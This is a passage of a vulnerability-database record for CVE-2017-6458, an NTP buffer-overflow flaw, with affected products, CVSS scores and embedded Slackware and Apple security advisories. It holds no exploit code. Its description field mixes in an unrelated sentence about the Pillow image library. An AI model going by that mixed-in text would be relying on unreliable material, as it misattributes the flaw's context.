"https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201703-1146", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "ntp", "scope": "eq", "trust": 1.3, "vendor": "ntp", "version": "4.2.8" }, { "model": "ntp", "scope": "lt", "trust": 1.0, "vendor": "ntp", "version": "4.2.8" }, { "model": "hpux-ntp", "scope": "lt", "trust": 1.0, "vendor": "hpe", "version": "c.4.2.8.4.0" }, { "model": "ntp", "scope": "lt", "trust": 1.0, "vendor": "ntp", "version": "4.3.94" }, { "model": "ntp", "scope": "gte", "trust": 1.0, "vendor": "ntp", "version": "4.3.0" }, { "model": "mac os x", "scope": "lt", "trust": 1.0, "vendor": "apple", "version": "10.13" }, { "model": "simatic net cp 443-1 opc ua", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "*" }, { "model": "mac os x", "scope": "gte", "trust": 1.0, "vendor": "apple", "version": "10.8.0" }, { "model": "ntp", "scope": "eq", "trust": 0.8, "vendor": "ntp", "version": "4.3.94" }, { "model": "ntp", "scope": "eq", "trust": 0.8, "vendor": "ntp", "version": "4.2.8p10" }, { "model": "ntp", "scope": "lt", "trust": 0.8, "vendor": "ntp", "version": "4.3.x" }, { "model": "ntp", "scope": "eq", "trust": 0.8, "vendor": "ntp", "version": null }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.43" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.46" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.14" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.44" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.15" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.45" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.16" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.47" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.18" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.17" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "17.04" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "16.10" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "16.04" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "ntpd", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3" }, { "model": "ntpd", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.90" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.25" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.6" }, { "model": "p74", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "p153", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "p150", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "p8", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p7", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p6", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p5", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p4", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p4", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.2" }, { "model": "p1", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.2" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.93" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.92" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.77" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.70" }, { "model": "4.2.8p9", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p8", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p7", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p6", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p5", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p4", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p3-rc1", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p3", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p2", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p1", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p385", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p366", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p22", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p111", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p11", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.5p3", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.5p203", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.5p186", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.0.a", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "ntp", "scope": "ne", "trust": 0.3, "vendor": "ntp", "version": "4.3.94" }, { "model": "4.2.8p10", "scope": "ne", "trust": 0.3, "vendor": "ntp", "version": null } ], "sources": [ { "db": "BID", "id": "97051" }, { "db": "JVNDB", "id": "JVNDB-2017-002167" }, { "db": "NVD", "id": "CVE-2017-6458" }, { "db": "CNNVD", "id": "CNNVD-201703-105" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "4.2.8", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "4.3.94", "versionStartIncluding": "4.3.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:hpe:hpux-ntp:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "c.4.2.8.4.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "10.13", "versionStartIncluding": "10.8.0", "vulnerable": true } ], "operator": "OR" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:siemens:simatic_net_cp_443-1_opc_ua_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:siemens:simatic_net_cp_443-1_opc_ua:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2017-6458" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Siemens reported these vulnerabilities to CISA.", "sources": [ { "db": "CNNVD", "id": "CNNVD-201703-105" } ], "trust": 0.6 }, "cve": "CVE-2017-6458", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": true, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "Single", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 6.5, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2017-6458", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "VHN-114661", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:S/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.8, "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 8.8, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2017-6458", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "Low", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2017-6458", "trust": 1.8, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-202104-975", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201703-105", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-114661", "trust": 0.1, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2017-6458", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-114661" }, { "db": "VULMON", "id": "CVE-2017-6458" }, { "db": "JVNDB", "id": "JVNDB-2017-002167" }, { "db": "NVD", "id": "CVE-2017-6458" }, { "db": "CNNVD", "id": "CNNVD-202104-975" }, { "db": "CNNVD", "id": "CNNVD-201703-105" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple buffer overflows in the ctl_put* functions in NTP before 4.2.8p10 and 4.3.x before 4.3.94 allow remote authenticated users to have unspecified impact via a long variable. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. \nAttackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. NTP (Network Time Protocol, Network Time Protocol) is a protocol for synchronizing computer clocks over a network. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n[slackware-security] ntp (SSA:2017-112-02)\n\nNew ntp packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\n14.2, and -current to fix security issues. \n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n+--------------------------+\npatches/packages/ntp-4.2.8p10-i586-1_slack14.2.txz: Upgraded. \n In addition to bug fixes and enhancements, this release fixes security\n issues of medium and low severity:\n Denial of Service via Malformed Config (Medium)\n Authenticated DoS via Malicious Config Option (Medium)\n Potential Overflows in ctl_put() functions (Medium)\n Buffer Overflow in ntpq when fetching reslist from a malicious ntpd (Medium)\n 0rigin DoS (Medium)\n Buffer Overflow in DPTS Clock (Low)\n Improper use of snprintf() in mx4200_send() (Low)\n The following issues do not apply to Linux systems:\n Privileged execution of User Library code (WINDOWS PPSAPI ONLY) (Low)\n Stack Buffer Overflow from Command Line (WINDOWS installer ONLY) (Low)\n Data Structure terminated insufficiently (WINDOWS installer ONLY) (Low)\n For more information, see:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6464\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6463\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6458\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6460\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9042\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6462\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6451\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6455\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6452\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6459\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p10-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p10-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p10-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p10-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p10-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p10-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p10-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p10-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p10-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p10-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/ntp-4.2.8p10-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/ntp-4.2.8p10-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p10-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p10-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 package:\ne3e18355dbb881f31030c325d396691f ntp-4.2.8p10-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n7ca81f398c6f3fc306cf5e0ce4821ff7 ntp-4.2.8p10-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\nbb14e63e0ea28856fb14816848fad378 ntp-4.2.8p10-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n77bee4e0b7d7bae54c431210ba7b20f8 ntp-4.2.8p10-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n4424d362ec1dcb75d35560cc25f291b8 ntp-4.2.8p10-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n94bea621e2bad59b80553a9516c4ddb6 ntp-4.2.8p10-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\nb9edb40c9e94a8248b57f96a0f7d0f49 ntp-4.2.8p10-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\nd8a52549c46ca33833f68d7b063ab1f2 ntp-4.2.8p10-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\nb36dd3b339aff2718dbd541a9f44b0a4 ntp-4.2.8p10-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\nb55bc11c2aa8d0378005af5dbb105119 ntp-4.2.8p10-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\n1e625a8f4732aa776992210eaac05f04 ntp-4.2.8p10-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n22f25f35765d0cb3ece21e5db79091cd ntp-4.2.8p10-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n78de6454532d6c7d52242eadab528d64 n/ntp-4.2.8p10-i586-1.txz\n\nSlackware x86_64 -current package:\n0522a4270909826999d07567e9a9de56 n/ntp-4.2.8p10-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg ntp-4.2.8p10-i586-1_slack14.2.txz\n\nThen, restart the NTP daemon:\n\n# sh /etc/rc.d/rc.ntpd restart\n\nNOTE: On Slackware -current, first install the new etc package, and then\nbe sure to move the .new config files and rc.ntpd script into place before\nrestarting!\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. |\n+------------------------------------------------------------------------+\n-----BEGIN PGP SIGNATURE-----\n\niEYEARECAAYFAlj7hzYACgkQakRjwEAQIjNVhACdF5bLXhg1/7iHS02DHm90m59w\nIv8AnR5vpRBWUQDw3267R3QPXEkAnI3f\n=0ZW2\n-----END PGP SIGNATURE-----\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2017-09-25-1 macOS High Sierra 10.13\n\nmacOS High Sierra 10.13 is now available and addresses the following:\n\nApplication Firewall\nAvailable for: OS X Lion v10.8 and later\nImpact: A previously denied application firewall setting may take\neffect after upgrading\nDescription: An upgrade issue existed in the handling of firewall\nsettings. This issue was addressed through improved handling of\nfirewall settings during upgrades. \nCVE-2017-7084: an anonymous researcher\n\nAppSandbox\nAvailable for: OS X Lion v10.8 and later\nImpact: An application may be able to cause a denial of service\nDescription: Multiple denial of service issues were addressed through\nimproved memory handling. \nCVE-2017-7074: Daniel Jalkut of Red Sweater Software\n\nCaptive Network Assistant\nAvailable for: OS X Lion v10.8 and later\nImpact: A local user may unknowingly send a password unencrypted over\nthe network\nDescription: The security state of the captive portal browser was not\nobvious. This issue was addressed with improved visibility of the\ncaptive portal browser security state. \nCVE-2017-7143: an anonymous researcher\n\nCFNetwork Proxies\nAvailable for: OS X Lion v10.8 and later\nImpact: An attacker in a privileged network position may be able to\ncause a denial of service\nDescription: Multiple denial of service issues were addressed through\nimproved memory handling. \nCVE-2017-7083: Abhinav Bansal of Zscaler Inc. \n\nCoreAudio\nAvailable for: OS X Lion v10.8 and later\nImpact: An application may be able to read restricted memory\nDescription: An out-of-bounds read was addressed by updating to Opus\nversion 1.1.4. \nCVE-2017-0381: V.E.O (@VYSEa) of Mobile Threat Research Team, Trend\nMicro\n\nDirectory Utility\nAvailable for: OS X Lion v10.8 and later\nImpact: A local attacker may be able to determine the Apple ID of the\nowner of the computer\nDescription: A permissions issue existed in the handling of the Apple\nID. This issue was addressed with improved access controls. \nCVE-2017-7138: an anonymous researcher\n\nfile\nAvailable for: OS X Lion v10.8 and later\nImpact: Multiple issues in file\nDescription: Multiple issues were addressed by updating to version\n5.30. \nCVE-2017-7121: found by OSS-Fuzz\nCVE-2017-7122: found by OSS-Fuzz\nCVE-2017-7123: found by OSS-Fuzz\nCVE-2017-7124: found by OSS-Fuzz\nCVE-2017-7125: found by OSS-Fuzz\nCVE-2017-7126: found by OSS-Fuzz\n\nHeimdal\nAvailable for: OS X Lion v10.8 and later\nImpact: An attacker in a privileged network position may be able to\nimpersonate a service\nDescription: A validation issue existed in the handling of the KDC-\nREP service name. This issue was addressed through improved\nvalidation. \nCVE-2017-11103: Jeffrey Altman, Viktor Duchovni, and Nico Williams\n\nIOFireWireFamily\nAvailable for: OS X Lion v10.8 and later\nImpact: An application may be able to execute arbitrary code with\nsystem privileges\nDescription: A memory corruption issue was addressed with improved\nmemory handling. \nCVE-2017-7077: Brandon Azad\n\nIOFireWireFamily\nAvailable for: OS X Lion v10.8 and later\nImpact: An application may be able to read restricted memory\nDescription: A validation issue was addressed with improved input\nsanitization. \nCVE-2017-7119: Xiaolong Bai, Min (Spark) Zheng of Alibaba Inc.,\nBenjamin Gnahm (@mitp0sh) of PDX\n\nKernel\nAvailable for: OS X Lion v10.8 and later\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed with improved\nmemory handling. \nCVE-2017-7114: Alex Plaskett of MWR InfoSecurity\n\nlibc\nAvailable for: OS X Lion v10.8 and later\nImpact: A remote attacker may be able to cause a denial-of-service\nDescription: A resource exhaustion issue in glob() was addressed\nthrough an improved algorithm. \nCVE-2017-7086: Russ Cox of Google\n\nlibc\nAvailable for: OS X Lion v10.8 and later\nImpact: An application may be able to cause a denial of service\nDescription: A memory consumption issue was addressed through\nimproved memory handling. \nCVE-2017-1000373\n\nlibexpat\nAvailable for: OS X Lion v10.8 and later\nImpact: Multiple issues in expat\nDescription: Multiple issues were addressed by updating to version\n2.2.1\nCVE-2016-9063\nCVE-2017-9233\n\nMail\nAvailable for: OS X Lion v10.8 and later\nImpact: The sender of an email may be able to determine the IP\naddress of the recipient\nDescription: Turning off \"Load remote content in messages\" did not\napply to all mailboxes. This issue was addressed with improved\nsetting propagation. \nCVE-2017-7141: an anonymous researcher\n\nMail Drafts\nAvailable for: OS X Lion v10.8 and later\nImpact: An attacker with a privileged network position may be able to\nintercept mail contents\nDescription: An encryption issue existed in the handling of mail\ndrafts. This issue was addressed with improved handling of mail\ndrafts meant to be sent encrypted. \nCVE-2017-7078: an anonymous researcher, an anonymous researcher, an\nanonymous researcher\n\nntp\nAvailable for: OS X Lion v10.8 and later\nImpact: Multiple issues in ntp\nDescription: Multiple issues were addressed by updating to version\n4.2.8p10\nCVE-2017-6451: Cure53\nCVE-2017-6452: Cure53\nCVE-2017-6455: Cure53\nCVE-2017-6458: Cure53\nCVE-2017-6459: Cure53\nCVE-2017-6460: Cure53\nCVE-2017-6462: Cure53\nCVE-2017-6463: Cure53\nCVE-2017-6464: Cure53\nCVE-2016-9042: Matthew Van Gundy of Cisco\n\nScreen Lock\nAvailable for: OS X Lion v10.8 and later\nImpact: Application Firewall prompts may appear over Login Window\nDescription: A window management issue was addressed through improved\nstate management. \nCVE-2017-7082: Tim 